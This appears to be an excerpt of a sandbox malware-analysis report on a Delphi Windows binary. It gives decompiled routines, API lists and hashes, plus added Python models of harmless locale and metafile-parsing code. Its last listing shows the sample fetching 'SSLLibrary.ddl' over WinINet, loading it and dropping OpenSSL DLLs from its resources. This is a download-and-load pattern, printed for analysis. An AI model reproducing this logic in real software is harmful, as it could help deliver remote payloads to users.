                                                     				E004049C0( &_v12);                                    // clear the marker prefix/suffix strings
                                                     				E004049C0( &_v16);
                                                     				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);             // 0x25 = LOCALE_ITLZERO (leading zero in hours)
                                                     				_t104 = E00409664(0x40e5c8, 0, _t196);
                                                     				_t197 = _t104;
                                                     				if(_t104 != 0) {
                                                     					E00404A58( &_v8, 0x40e620);                        // hour picture with leading zero
                                                     				} else {
                                                     					E00404A58( &_v8, 0x40e614);                        // hour picture without leading zero
                                                     				}
                                                     				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);             // 0x23 = LOCALE_ITIME (0 = 12-hour clock)
                                                     				_t111 = E00409664(0x40e5c8, 0, _t197);
                                                     				_t198 = _t111;
                                                     				if(_t111 == 0) {                                      // 12-hour clock: position the AM/PM marker
                                                     					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);        // 0x1005 = LOCALE_ITIMEMARKPOSN (1 = prefix, 0 = suffix)
                                                     					if(E00409664(0x40e5c8, 0, _t198) != 0) {
                                                     						E00404A58( &_v12, 0x40e63c);                   // marker as prefix
                                                     					} else {
                                                     						E00404A58( &_v16, 0x40e62c);                   // marker as suffix
                                                     					}
                                                     				}
                                                     				_push(_v12);
                                                     				_push(_v8);
                                                     				_push(":mm");
                                                     				_push(_v16);
                                                     				E00404D40();                                          // concatenate the pushed parts: short time format
                                                     				_push(_v12);
                                                     				_push(_v8);
                                                     				_push(":mm:ss");
                                                     				_push(_v16);
                                                     				E00404D40();                                          // concatenate the pushed parts: long time format
                                                     				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);             // 0xc = LOCALE_SLIST, default ','
                                                     				_pop(_t183);
                                                     				 *[fs:eax] = _t183;                                   // restore the previous SEH frame
                                                    				_push(E0040E5BA);
                                                    				return E004049E4( &_v68, 0x10);
                                                    			}

Instruction address column for the listing above (one entry per decompiled line), spanning 0x0040e2e8 to 0x0040e5b2.


                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                    • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
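The routine above is what the report's "Contains functionality to query locales information" signature is keyed on: it calls GetThreadLocale once and then reads a fixed series of LCTYPE values through the two helpers at 0040C964 (string) and 0040C9B0 (single character). Read with the helper arguments as (locale, default, LCTYPE), the constants 0x0E, 0x19, 0x1D, 0x1E, 0x1F, 0x20, 0x23, 0x25, 0x28, 0x29, 0x1005 and 0x0C are LOCALE_SDECIMAL, LOCALE_ICURRDIGITS, LOCALE_SDATE, LOCALE_STIME, LOCALE_SSHORTDATE, LOCALE_SLONGDATE, LOCALE_ITIME, LOCALE_ITLZERO, LOCALE_S1159, LOCALE_S2359, LOCALE_ITIMEMARKPOSN and LOCALE_SLIST, and the defaults ("m/d/yy", "mmmm d, yyyy", ":mm", ":mm:ss", "AMPM ", " AMPM") are the ones the Delphi RTL uses when it initialises its global date and time format settings at start-up. That identification is the editor's reading of the decompiled constants, not something the report states; the practical point for triage is that this block is runtime housekeeping executed by every Delphi binary, not a language or region check, so it should not be counted as geofencing evidence on its own. The Python model below is an added example (not code from the sample, the RTL or Joe Sandbox) that reproduces the branch logic of the listing on constructed GetLocaleInfoA results; the 'h'/'hh' strings assigned at 0x40e614/0x40e620 are assumed from the RTL source and the date-format translation step (E0040CC9C) is deliberately not modelled.

```python
"""
Model of the locale-initialisation routine decompiled above (the function
that calls GetThreadLocale and then GetLocaleInfoA via the 0040C964 /
0040C9B0 helpers). Added example for this report page; it is not code from
the sample or from Joe Sandbox. The LCTYPE names come from the Windows SDK
and the 'h' / 'hh' strings from the Delphi RTL source; both are assumptions
about the decompiled constants rather than facts the report itself states.
"""

# LCTYPE values that appear as the third argument of the helper calls.
LCTYPE_NAMES = {
    0x000C: "LOCALE_SLIST",
    0x000E: "LOCALE_SDECIMAL",
    0x0019: "LOCALE_ICURRDIGITS",
    0x001D: "LOCALE_SDATE",
    0x001E: "LOCALE_STIME",
    0x001F: "LOCALE_SSHORTDATE",
    0x0020: "LOCALE_SLONGDATE",
    0x0023: "LOCALE_ITIME",
    0x0025: "LOCALE_ITLZERO",
    0x0028: "LOCALE_S1159",
    0x0029: "LOCALE_S2359",
    0x1005: "LOCALE_ITIMEMARKPOSN",
}


def decode_call(lctype, default):
    """Name the LCTYPE behind one decompiled helper call, e.g. (0x0e, '.')."""
    return f"{LCTYPE_NAMES.get(lctype, hex(lctype))} (default {default!r})"


def str_to_int_def(s, default=0):
    """Delphi StrToIntDef: parse an integer, fall back to default on failure."""
    try:
        return int(s.strip())
    except (ValueError, AttributeError):
        return default


def format_settings(locale_info):
    """
    Rebuild the globals the routine writes to 0x49e68b..0x49e752.
    locale_info maps an LCTYPE to the string GetLocaleInfoA would return;
    a missing key plays the role of a failed GetLocaleInfoA call, so the
    hard-coded default is used, exactly as in the decompiled code.
    """
    def get_str(lctype, default):
        return locale_info.get(lctype, default)

    def get_char(lctype, default):
        return get_str(lctype, default)[:1] or default

    s = {}
    s["DecimalSeparator"] = get_char(0x0E, ".")          # E0040C9B0(.., '.', 0xe)
    s["CurrencyDecimals"] = str_to_int_def(get_str(0x19, "0"))
    s["DateSeparator"] = get_char(0x1D, "/")             # E0040C9B0(.., '/', 0x1d)
    # The sample passes the two date formats through E0040CC9C before
    # storing them at 0x49e690 / 0x49e694; that translation is not modelled.
    s["ShortDateFormat"] = get_str(0x1F, "m/d/yy")
    s["LongDateFormat"] = get_str(0x20, "mmmm d, yyyy")
    s["TimeSeparator"] = get_char(0x1E, ":")             # E0040C9B0(.., ':', 0x1e)
    s["TimeAMString"] = get_str(0x28, "AM")
    s["TimePMString"] = get_str(0x29, "PM")

    # Hour format: a non-zero LOCALE_ITLZERO selects 'hh', otherwise 'h'
    # (the _v8 = 0x40e620 / 0x40e614 branch in the listing).
    hour_fmt = "hh" if str_to_int_def(get_str(0x25, "0")) != 0 else "h"
    prefix = postfix = ""
    # 12-hour clock (LOCALE_ITIME == 0): marker position decides whether the
    # "AMPM " prefix (_v12) or the " AMPM" postfix (_v16) is set.
    if str_to_int_def(get_str(0x23, "0")) == 0:
        if str_to_int_def(get_str(0x1005, "0")) != 0:
            prefix = "AMPM "
        else:
            postfix = " AMPM"
    # The two E00404D40 string concatenations.
    s["ShortTimeFormat"] = prefix + hour_fmt + ":mm" + postfix
    s["LongTimeFormat"] = prefix + hour_fmt + ":mm:ss" + postfix
    s["ListSeparator"] = get_char(0x0C, ",")             # E0040C9B0(.., ',', 0xc)
    return s


# Constructed inputs (not taken from the sandbox run): an en-US style locale
# and a 24-hour, leading-zero locale such as de-DE.
EN_US = {0x0E: ".", 0x1D: "/", 0x1E: ":", 0x1F: "M/d/yyyy",
         0x23: "0", 0x25: "0", 0x1005: "0"}
DE_DE = {0x0E: ",", 0x1D: ".", 0x1E: ":", 0x23: "1", 0x25: "1", 0x0C: ";"}

if __name__ == "__main__":
    for name, info in (("en-US", EN_US), ("de-DE", DE_DE)):
        print(name, format_settings(info))
    print(decode_call(0x0E, "."), "|", decode_call(0x1005, "0"))
```

Running the model on the two constructed locales yields "h:mm AMPM" / "h:mm:ss AMPM" for the en-US case and "hh:mm" / "hh:mm:ss" for the 24-hour case, which is the whole observable effect of this routine: it only fills in format strings for later date and time rendering, and nothing in the listing branches on the locale identifier itself.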

                                                    C-Code - Quality: 92%
                                                    			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				struct HWND__* _v24;
                                                    				intOrPtr _v28;
                                                    				char _v32;
                                                    				struct tagRECT _v48;
                                                    				struct tagRECT _v64;
                                                    				struct HWND__* _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t78;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t93;
                                                    				intOrPtr _t98;
                                                    				intOrPtr _t101;
                                                    				void* _t102;
                                                    				intOrPtr* _t104;
                                                    				intOrPtr _t106;
                                                    				intOrPtr _t110;
                                                    				intOrPtr _t112;
                                                    				struct HWND__* _t113;
                                                    				intOrPtr _t114;
                                                    				intOrPtr _t116;
                                                    				intOrPtr _t117;
                                                    
                                                    				_t102 = __ecx;
                                                    				_t101 = __eax;
                                                    				_v5 = 1;
                                                    				_t113 = E00438D40(_a4 + 0xfffffff7);
                                                    				_v24 = _t113;
                                                    				_t53 = GetWindow(_t113, 4);
                                                    				_t104 =  *0x49dbcc; // 0x49ebb8
                                                    				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                                    					L6:
                                                    					if(_v24 == 0) {
                                                    						L25:
                                                    						return _v5;
                                                    					}
                                                    					_t114 = _t101;
                                                    					while(1) {
                                                    						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                                    						if(_t55 == 0) {
                                                    							break;
                                                    						}
                                                    						_t114 = _t55;
                                                    					}
                                                    					_t112 = E00441704(_t114);
                                                    					_v28 = _t112;
                                                    					if(_t112 == _v24) {
                                                    						goto L25;
                                                    					}
                                                    					_t13 = _a4 - 0x10; // 0xe87d83e8
                                                    					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                                    					if(_t60 == 0) {
                                                    						_t19 = _a4 - 0x10; // 0xe87d83e8
                                                    						_t106 =  *0x437498; // 0x4374e4
                                                    						__eflags = E00403D78( *_t19, _t106);
                                                    						if(__eflags == 0) {
                                                    							__eflags = 0;
                                                    							_v32 = 0;
                                                    						} else {
                                                    							_t21 = _a4 - 0x10; // 0xe87d83e8
                                                    							_v32 = E00441704( *_t21);
                                                    						}
                                                    						L19:
                                                    						_v12 = 0;
                                                    						_t65 = _a4;
                                                    						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                    						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                    						_push( &_v32);
                                                    						_push(E00438884);
                                                    						_push(GetCurrentThreadId());
                                                    						L004075C8();
                                                    						_t126 = _v12;
                                                    						if(_v12 == 0) {
                                                    							goto L25;
                                                    						}
                                                    						GetWindowRect(_v24,  &_v48);
                                                    						_push(_a4 + 0xfffffff7);
                                                    						_push(_a4 - 1);
                                                    						E00403DE8(_t101, _t126);
                                                    						_t78 =  *0x49eb38; // 0x0
                                                    						_t110 =  *0x4360a0; // 0x4360ec
                                                    						if(E00403D78(_t78, _t110) == 0) {
                                                    							L23:
                                                    							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                    								_v5 = 0;
                                                    							}
                                                    							goto L25;
                                                    						}
                                                    						_t84 =  *0x49eb38; // 0x0
                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                                    							goto L23;
                                                    						}
                                                    						_t86 =  *0x49eb38; // 0x0
                                                    						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                                    							goto L25;
                                                    						}
                                                    						goto L23;
                                                    					}
                                                    					_t116 = _t60;
                                                    					while(1) {
                                                    						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                                    						if(_t93 == 0) {
                                                    							break;
                                                    						}
                                                    						_t116 = _t93;
                                                    					}
                                                    					_v32 = E00441704(_t116);
                                                    					goto L19;
                                                    				}
                                                    				_t117 = E00437E5C(_v24, _t102);
                                                    				if(_t117 == 0) {
                                                    					goto L25;
                                                    				} else {
                                                    					while(1) {
                                                    						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                                    						if(_t98 == 0) {
                                                    							break;
                                                    						}
                                                    						_t117 = _t98;
                                                    					}
                                                    					_v24 = E00441704(_t117);
                                                    					goto L6;
                                                    				}
                                                    			}


Instruction address column for the listing above (one entry per decompiled line; 0x00000000 marks lines with no code address), spanning 0x004388f0 to 0x00438a87.


                                                    APIs
                                                      • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                      • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                    • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                    • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                    • 733AAC10.USER32(00000000,00438884,?,00000000,00000004,?,-0000000C,?), ref: 004389EC
                                                    • GetWindowRect.USER32 ref: 00438A03
                                                    • IntersectRect.USER32 ref: 00438A71
                                                      • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                      • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                      • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                      • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                    • String ID: `C$tC
                                                    • API String ID: 2049660638-2788972245
                                                    • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                    • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0045A8B7
                                                    • GetWindowRect.USER32 ref: 0045A911
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                    • MessageBoxA.USER32 ref: 0045A98A
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                    • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Active$MessageRect
                                                    • String ID: (
                                                    • API String ID: 3147912190-3887548279
                                                    • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                    • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				int _v12;
                                                    				BYTE* _v16;
                                                    				intOrPtr _v18;
                                                    				signed int _v24;
                                                    				short _v26;
                                                    				short _v28;
                                                    				short _v30;
                                                    				short _v32;
                                                    				char _v38;
                                                    				struct tagMETAFILEPICT _v54;
                                                    				intOrPtr _v118;
                                                    				intOrPtr _v122;
                                                    				struct tagENHMETAHEADER _v154;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t115;
                                                    				struct HENHMETAFILE__* _t119;
                                                    				struct HENHMETAFILE__* _t120;
                                                    				void* _t122;
                                                    				void* _t123;
                                                    				void* _t124;
                                                    				void* _t125;
                                                    				intOrPtr _t126;
                                                    
                                                    				_t124 = _t125;
                                                    				_t126 = _t125 + 0xffffff68;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t122 = __eax;
                                                    				E0042819C(__eax);
                                                    				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                                    				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
                                                    					E00425F58();
                                                    				}
                                                    				_v12 = _v12 - 0x16;
                                                    				_v16 = E0040275C(_v12);
                                                    				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                    				 *[fs:eax] = _t126;
                                                    				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
                                                    				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                    				if(_v24 == 0) {
                                                    					_v24 = 0x60;
                                                    				}
                                                    				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                    				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                    				_v54.mm = 8;
                                                    				_v54.xExt = 0;
                                                    				_v54.yExt = 0;
                                                    				_v54.hMF = 0;
                                                    				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                    				 *(_t103 + 8) = _t119;
                                                    				if(_t119 == 0) {
                                                    					E00425F58();
                                                    				}
                                                    				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                    				_v54.mm = 8;
                                                    				_v54.xExt = _v122;
                                                    				_v54.yExt = _v118;
                                                    				_v54.hMF = 0;
                                                    				DeleteEnhMetaFile( *(_t103 + 8));
                                                    				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                    				 *(_t103 + 8) = _t120;
                                                    				if(_t120 == 0) {
                                                    					E00425F58();
                                                    				}
                                                    				 *((char*)(_t122 + 0x2c)) = 0;
                                                    				_pop(_t115);
                                                    				 *[fs:eax] = _t115;
                                                    				_push(0x428476);
                                                    				return E0040277C(_v16);
                                                    			}
                                                    Statement addresses (side column of the listing above, in order): 0x00428301 0x00428303 0x0042830c 0x0042830f 0x00428312 0x00428316 0x00428328 0x00428332 0x00428342 0x00428342 0x00428347 0x00428353 0x00428356 0x00428364 0x00428372 0x0042837c 0x00428385 0x00428387 0x00428387 0x004283a7 0x004283c4 0x004283c7 0x004283d0 0x004283d5 0x004283da 0x004283f0 0x004283f2 0x004283f7 0x004283f9 0x004283f9 0x0042840b 0x00428410 0x0042841a 0x00428420 0x00428425 0x0042842c 0x00428444 0x00428446 0x0042844b 0x0042844d 0x0042844d 0x00428452 0x00428458 0x0042845b 0x0042845e 0x0042846e

                                                    APIs
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                    • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                    • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$Bits$DeleteHeader
                                                    • String ID: `
                                                    • API String ID: 1990453761-2679148245
                                                    • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                    • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
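The checks at the top of E00428300 are those of a Windows placeable (Aldus) metafile header: a key of 0x9AC6CDD7 at offset 0, a 22-byte (0x16) header whose last word is compared against a checksum computed over the header, an Inch field replaced with 0x60 (96) when it is zero, and bounds scaled with MulDiv(..., 0x9EC (2540), inch), i.e. converted to HIMETRIC, before the remaining stream (size minus 0x16) goes to SetWinMetaFileBits with mapping mode 8 (MM_ANISOTROPIC). The Python below is an added illustration of those checks; it is not code from this report or from the sample. The field layout and the XOR checksum follow the documented placeable-header format, the MulDiv rounding is reproduced by a local helper, and the input it parses is constructed in the block:

```python
import struct

PLACEABLE_KEY = 0x9AC6CDD7     # magic tested against _v38 in the listing above
PLACEABLE_HEADER_LEN = 0x16    # 22 bytes, the amount subtracted from the stream size
HIMETRIC_PER_INCH = 0x9EC      # 2540, the MulDiv scale factor in the listing
DEFAULT_INCH = 0x60            # 96, substituted when the Inch field is zero
HEADER_FMT = "<IHhhhhHIH"      # Key, HWmf, Left, Top, Right, Bottom, Inch, Reserved, Checksum


def placeable_checksum(header):
    """XOR of the ten 16-bit words that precede the Checksum field."""
    acc = 0
    for word in struct.unpack_from("<10H", header, 0):
        acc ^= word
    return acc


def muldiv(a, b, c):
    """Integer a*b/c rounded to nearest, half away from zero, like Win32 MulDiv."""
    prod = a * b
    if prod >= 0:
        return (prod + c // 2) // c
    return -((-prod + c // 2) // c)


def build_placeable_header(left, top, right, bottom, inch, hmf=0):
    """Constructed header for testing; the checksum is computed, not hard-coded."""
    body = struct.pack("<IHhhhhHI", PLACEABLE_KEY, hmf, left, top, right, bottom, inch, 0)
    return body + struct.pack("<H", placeable_checksum(body))


def parse_placeable_wmf(data):
    """Mirror the checks in E00428300 and return what it would hand to GDI."""
    if len(data) < PLACEABLE_HEADER_LEN:
        raise ValueError("stream shorter than a placeable header")
    key, _hmf, left, top, right, bottom, inch, _reserved, checksum = struct.unpack_from(
        HEADER_FMT, data, 0
    )
    if key != PLACEABLE_KEY:
        raise ValueError("missing placeable metafile key")
    if placeable_checksum(data) != checksum:
        raise ValueError("placeable header checksum mismatch")
    if inch == 0:
        inch = DEFAULT_INCH
    return {
        "inch": inch,
        "width_himetric": muldiv(right - left, HIMETRIC_PER_INCH, inch),
        "height_himetric": muldiv(bottom - top, HIMETRIC_PER_INCH, inch),
        # Everything after the 22-byte header is the raw WMF record stream that
        # SetWinMetaFileBits receives with size len(data) - 0x16.
        "records": data[PLACEABLE_HEADER_LEN:],
    }


if __name__ == "__main__":
    # Constructed sample: 200 x 100 units at 100 units per inch, then two dummy record bytes.
    sample = build_placeable_header(0, 0, 200, 100, 100) + b"\x00\x00"
    print(parse_placeable_wmf(sample))
```

A stream that fails the key or checksum test takes the E00425F58 path in the listing (an exception, not a silent fallback), so a triage script should treat a checksum mismatch as "not a valid placeable WMF" rather than patch the header and continue.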

                                                    C-Code - Quality: 65%
                                                    			E00495084(void* __ebx, void* __edi, void* __esi) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t77;
                                                    				intOrPtr _t79;
                                                    				struct HINSTANCE__* _t82;
                                                    				void* _t84;
                                                    				intOrPtr _t87;
                                                    
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(_t87);
                                                    				_push(0x4951d4);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t87;
                                                    				_t84 = 3;
                                                    				_t55 = 0x49f0f4;
                                                    				do {
                                                    					if( *_t55 == 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t68 =  *0x49f100; // 0x0
                                                    						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
                                                    						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
                                                    							_v5 = 0;
                                                    							goto L5;
                                                    						} else {
                                                    							_v5 = 1;
                                                    							_t72 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
                                                    							_t82 = LoadLibraryA(E00404E80(_v16));
                                                    							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
                                                    							_t74 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v20, "\\libeay32.dll", _t74);
                                                    							E0041DD9C(_t30, _t56, _v20, _t82);
                                                    							E00403BEC(_t56);
                                                    							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
                                                    							_t77 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
                                                    							E0041DD9C(_t38, _t57, _v24, _t82);
                                                    							E00403BEC(_t57);
                                                    							FreeLibrary(_t82);
                                                    							_t79 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
                                                    							E00404BB8( &_v28, E00404E80(_v32));
                                                    							E00409BAC(_v28);
                                                    						}
                                                    					}
                                                    					break;
                                                    					L5:
                                                    					_t55 = _t55 + 4;
                                                    					_t84 = _t84 - 1;
                                                    				} while (_t84 != 0);
                                                    				_pop(_t70);
                                                    				 *[fs:eax] = _t70;
                                                    				_push(0x4951db);
                                                    				return E004049E4( &_v32, 6);
                                                    			}
                                                    Statement addresses (side column of the listing above, in order): 0x00495089 0x0049508a 0x0049508b 0x0049508c 0x0049508d 0x0049508e 0x0049508f 0x00495090 0x00495091 0x00495095 0x00495096 0x0049509b 0x0049509e 0x004950a1 0x004950a6 0x004950ab 0x004950ae 0x00000000 0x004950b4 0x004950bc 0x004950c2 0x004950d3 0x004951ab 0x00000000 0x004950d9 0x004950d9 0x004950e5 0x004950eb 0x004950fe 0x00495115 0x0049511f 0x00495125 0x0049512f 0x00495136 0x00495150 0x0049515a 0x00495160 0x0049516a 0x00495171 0x00495177 0x00495184 0x0049518a 0x0049519c 0x004951a4 0x004951a4 0x004950d3 0x00000000 0x004951af 0x004951af 0x004951b2 0x004951b2 0x004951bb 0x004951be 0x004951c1 0x004951d3

                                                    APIs
                                                      • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                      • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                      • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                      • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
